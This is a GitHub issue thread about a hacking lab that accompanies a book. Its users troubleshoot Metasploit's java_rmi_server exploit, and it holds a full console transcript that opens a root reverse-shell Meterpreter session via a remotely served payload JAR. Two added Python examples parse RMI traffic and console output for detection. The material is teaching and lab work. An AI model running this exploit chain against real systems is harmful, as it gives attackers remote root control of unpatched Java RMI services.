Open robertwatkins opened 7 years ago
Hmm, so I am able to reproduce this but not immediately sure what the issue is. I will start digging into this although likely not to make too much progress until this weekend.
The exploit should send the first stager and then that stager should trigger an HTTP request to the URL that metasploit serves the actual payload from (http://192.100.200.166:8080/F2PdPb). Metasploit seems to be complaining that it doesn't get that connect back....
Might be worth trying to play with the HTTPDELAY option to see if it helps.
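The stager and callback flow described above, looked at from the defending side: an added example, not code from this thread or from Metasploit, that checks whether a client stream arriving on the RMI registry port starts with the JRMP handshake that "Sending RMI Header..." refers to, and whether the call that follows carries an HTTP codebase URL, which is the property a listener-side detection would key on. The header layout (magic "JRMI", a 2-byte version, a protocol byte 0x4b/0x4c/0x4d), the call byte 0x50 and the serialized-string tag 0x74 come from the JRMP and Java serialization formats; the sample bytes are constructed and abbreviated, not a faithful capture.

```python
import struct

# Added example (not from the issue thread or Metasploit): triage one
# client-to-server TCP stream seen by a Java RMI registry listener.
JRMI_MAGIC = b"JRMI"
PROTOCOLS = {0x4B: "StreamProtocol", 0x4C: "SingleOpProtocol", 0x4D: "MultiplexProtocol"}
TC_STRING = 0x74  # Java serialization tag for a UTF string


def parse_jrmp_header(data: bytes):
    """Return (version, protocol name) if data opens with a JRMP handshake, else None."""
    if len(data) < 7 or data[:4] != JRMI_MAGIC:
        return None
    version, proto = struct.unpack(">HB", data[4:7])
    if proto not in PROTOCOLS:
        return None
    return version, PROTOCOLS[proto]


def find_serialized_strings(data: bytes):
    """Heuristic scan for TC_STRING (0x74 + 2-byte length + ASCII) inside a stream."""
    found, i = [], 0
    while i + 3 <= len(data):
        if data[i] == TC_STRING:
            n = struct.unpack(">H", data[i + 1:i + 3])[0]
            s = data[i + 3:i + 3 + n]
            if n and len(s) == n and all(0x20 <= b < 0x7F for b in s):
                found.append(s.decode("ascii"))
                i += 3 + n
                continue
        i += 1
    return found


def triage_client_stream(data: bytes) -> dict:
    """Flag a JRMP stream whose call names a remote HTTP codebase to load classes from."""
    header = parse_jrmp_header(data)
    urls = [s for s in find_serialized_strings(data) if s.startswith(("http://", "https://"))]
    return {
        "is_jrmp": header is not None,
        "version": header[0] if header else None,
        "protocol": header[1] if header else None,
        "codebase_urls": urls,
        "suspicious": header is not None and bool(urls),
    }


# Constructed sample stream: JRMP handshake, a made-up client endpoint, then a
# Call message whose body carries the payload URL quoted in the thread above.
CODEBASE_URL = b"http://192.100.200.121:8080/bnfB2s2cmKl"
SAMPLE_STREAM = (
    JRMI_MAGIC + b"\x00\x02" + b"\x4b"                      # header, StreamProtocol
    + b"\x00\x09127.0.0.1" + b"\x00\x00\x04\x57"            # client endpoint (constructed)
    + b"\x50" + b"\xac\xed\x00\x05"                         # Call byte, serialization magic
    + bytes([TC_STRING]) + struct.pack(">H", len(CODEBASE_URL)) + CODEBASE_URL
    + b"\x70"                                               # TC_NULL tail (constructed)
)

if __name__ == "__main__":
    print(triage_client_stream(SAMPLE_STREAM))
```

A plain RMI client also completes this handshake, so the handshake alone is not a signal; the combination of a handshake and a call that points the server at an external HTTP codebase is what separates this traffic from ordinary registry lookups.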
Thanks for the reply (I never know if it's something on my side or something in general). I tried modifying the HTTPDELAY, but the message appears before the delay starts its countdown.
I'm enjoying the book and the lab very much and may just take this opportunity to dig into docker a bit and look at how this lab is set up.
Really glad you are enjoying the book and labs! I am sorry about all the bugs but really appreciate the bug reports, so keep em coming. Will give an update as soon as I get a chance to really dig into this issue.
Adding some more details about how the lab works under the hood is definitely on my list of things I would like to add to the wiki. The code isn't particularly pretty and I am doing some funky stuff to set up the network manually.
@robertwatkins - ok, so I actually don't know what the issue is that caused this, but I was able to resolve it by just updating Metasploit. If you run sudo msfupdate from the command line this should update the version of msfconsole. Metasploit is a fast moving project at times, which is great in that you always have fresh exploits, but can also mean it has more opportunity to introduce bugs and break stuff.
Below is a quick run through of exploiting this. Notice that it says it fails and doesn't drop you to a meterpreter shell but if you use the 'sessions' command you are able to interact successfully.
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > ping sploit
[*] exec: ping sploit
PING sploit.labs (10.100.200.134) 56(84) bytes of data.
64 bytes from sploit.labs (10.100.200.134): icmp_seq=1 ttl=63 time=0.065 ms
64 bytes from sploit.labs (10.100.200.134): icmp_seq=2 ttl=63 time=0.133 ms
64 bytes from sploit.labs (10.100.200.134): icmp_seq=3 ttl=63 time=0.056 ms
^CInterrupt: use the 'exit' command to quit
msf exploit(java_rmi_server) > set RHOST 10.100.200.134
RHOST => 10.100.200.134
msf exploit(java_rmi_server) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] 10.100.200.134:1099 - Using URL: http://0.0.0.0:8080/bnfB2s2cmKl
[*] 10.100.200.134:1099 - Local IP: http://192.100.200.121:8080/bnfB2s2cmKl
[*] 10.100.200.134:1099 - Server started.
[*] 10.100.200.134:1099 - Sending RMI Header...
[*] 10.100.200.134:1099 - Sending RMI Call...
[*] 10.100.200.134:1099 - Replied to request for payload JAR
[*] Sending stage (49645 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:52680) at 2017-05-07 13:03:37 -0500
[-] 10.100.200.134:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.100.200.134:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(java_rmi_server) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter java/linux root @ sploit 192.168.56.101:4444 -> 192.168.56.1:52680 (10.100.200.134)
msf exploit(java_rmi_server) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100667/rw-rw-rwx 0 fil 2017-05-07 13:02:49 -0500 .dockerenv
40666/rw-rw-rw- 4096 dir 2016-09-16 18:53:14 -0500 bin
40666/rw-rw-rw- 4096 dir 2008-04-15 00:53:59 -0500 boot
40666/rw-rw-rw- 2860 dir 2017-05-07 13:02:49 -0500 dev
40666/rw-rw-rw- 4096 dir 2017-05-07 13:03:15 -0500 etc
40666/rw-rw-rw- 4096 dir 2008-04-15 00:53:59 -0500 home
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 initrd
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:27 -0500 lib
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 media
40666/rw-rw-rw- 4096 dir 2008-04-15 00:53:59 -0500 mnt
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 opt
40666/rw-rw-rw- 0 dir 2017-05-07 13:02:49 -0500 proc
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 root
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:33 -0500 sbin
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 srv
100666/rw-rw-rw- 195 fil 2016-09-16 18:35:23 -0500 start_sploits.sh
40666/rw-rw-rw- 0 dir 2017-05-07 13:02:49 -0500 sys
40666/rw-rw-rw- 4096 dir 2017-05-07 13:03:38 -0500 tmp
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:36 -0500 usr
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:37 -0500 var
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:22 -0500 vuln
meterpreter > ifconfig
Interface 1
============
Name : sw2_6 - sw2_6
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 10.100.200.134
IPv4 Netmask : 255.0.0.0
IPv6 Address : fe80::1428:ecff:fefa:9962
IPv6 Netmask : ::
Interface 2
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
meterpreter >
Very cool. I was able to see what you see. Though before I read your commands to ensure I was on the same server, I used cat /etc/hostname to see that I was on 'sploit'.
Thanks again. On to the next lab :)
I'm not able to run the java_rmi_server exploit successfully; each time, I get a message "Meterpreter session X closed. Reason: Died".
Looking at the wireshark traces on port 4444 and using (follow>tcp stream), I see what appears to be the staging jar files being sent, and then the connection starts to show a few [psh,ack] and then [rst,ack]. Does this show the meterpreter dying?
Regardless, is there something I can do to get this exploit to work?
=============================== Wireshark Captures java_rmi_server.zip java_rmi_server.port4444.zip
=============================== Metasploit console
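The 'sessions' check in the maintainer's reply above and the "closed. Reason: Died" message in this last comment, as an added example that is not code from the thread or from Metasploit: a parser for msfconsole output that records session opened and closed events alongside the module's own failure lines, then reports which sessions are actually live, so a "session opened" followed by "Exploit failed" is not misread as a failed run. The first input is the transcript quoted earlier in the thread; the second run, in which the session dies, is constructed, and the exact shape of the closed-session line is an assumption.

```python
import re

# Added example (not from the issue thread or Metasploit): reconcile the
# verdict an msf module prints with the session events that really happened.
SESSION_OPENED = re.compile(
    r"^\[\*\] (\w+) session (\d+) opened \((\S+) -> (\S+)\) at (.+)$")
SESSION_CLOSED = re.compile(            # line shape assumed, e.g. "... session 3 closed.  Reason: Died"
    r"^\[\*\] (?:\S+ - )?(\w+) session (\d+) closed\.\s+Reason: (.+)$")
EXPLOIT_FAILED = re.compile(r"^\[-\] (\S+) - Exploit failed: (.+)$")
NO_SESSION = "[*] Exploit completed, but no session was created."


def reconcile_run(lines):
    """Parse one msfconsole run and report which sessions are still live."""
    opened, closed, failures = {}, {}, []
    claimed_no_session = False
    for raw in lines:
        line = raw.rstrip()
        m = SESSION_OPENED.match(line)
        if m:
            opened[int(m.group(2))] = {"type": m.group(1), "handler": m.group(3),
                                       "peer": m.group(4), "at": m.group(5)}
            continue
        m = SESSION_CLOSED.match(line)
        if m:
            closed[int(m.group(2))] = m.group(3)  # session id -> reason
            continue
        m = EXPLOIT_FAILED.match(line)
        if m:
            failures.append({"target": m.group(1), "reason": m.group(2)})
            continue
        if line == NO_SESSION:
            claimed_no_session = True
    live = sorted(sid for sid in opened if sid not in closed)
    if live and (failures or claimed_no_session):
        verdict = "session live despite reported failure"   # the case in this thread
    elif live:
        verdict = "session live"
    elif opened:
        verdict = "session died"
    else:
        verdict = "no session"
    return {"live": live, "opened": opened, "closed": closed,
            "failures": failures, "verdict": verdict}


# Sample 1: the console lines quoted earlier in the thread.
RUN_FROM_THREAD = [
    "[*] Started reverse TCP handler on 192.168.56.101:4444",
    "[*] 10.100.200.134:1099 - Using URL: http://0.0.0.0:8080/bnfB2s2cmKl",
    "[*] 10.100.200.134:1099 - Sending RMI Header...",
    "[*] 10.100.200.134:1099 - Replied to request for payload JAR",
    "[*] Sending stage (49645 bytes) to 192.168.56.1",
    "[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:52680) at 2017-05-07 13:03:37 -0500",
    "[-] 10.100.200.134:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request",
    "[*] 10.100.200.134:1099 - Server stopped.",
    "[*] Exploit completed, but no session was created.",
]

# Sample 2: constructed run in which the session opens and then dies.
RUN_DIED = [
    "[*] Started reverse TCP handler on 192.168.56.101:4444",
    "[*] Sending stage (49645 bytes) to 192.168.56.1",
    "[*] Meterpreter session 3 opened (192.168.56.101:4444 -> 192.168.56.1:52702) at 2017-05-08 09:00:00 -0500",
    "[*] 192.168.56.1 - Meterpreter session 3 closed.  Reason: Died",
    "[*] Exploit completed, but no session was created.",
]

if __name__ == "__main__":
    for run in (RUN_FROM_THREAD, RUN_DIED):
        print(reconcile_run(run)["verdict"])
```

The verdict for the thread's own transcript is "session live despite reported failure", which is exactly the situation the 'sessions' command revealed; the same parser applied to a run with a "closed. Reason: Died" line reports "session died", so the two failure modes in this thread are told apart from the console output alone.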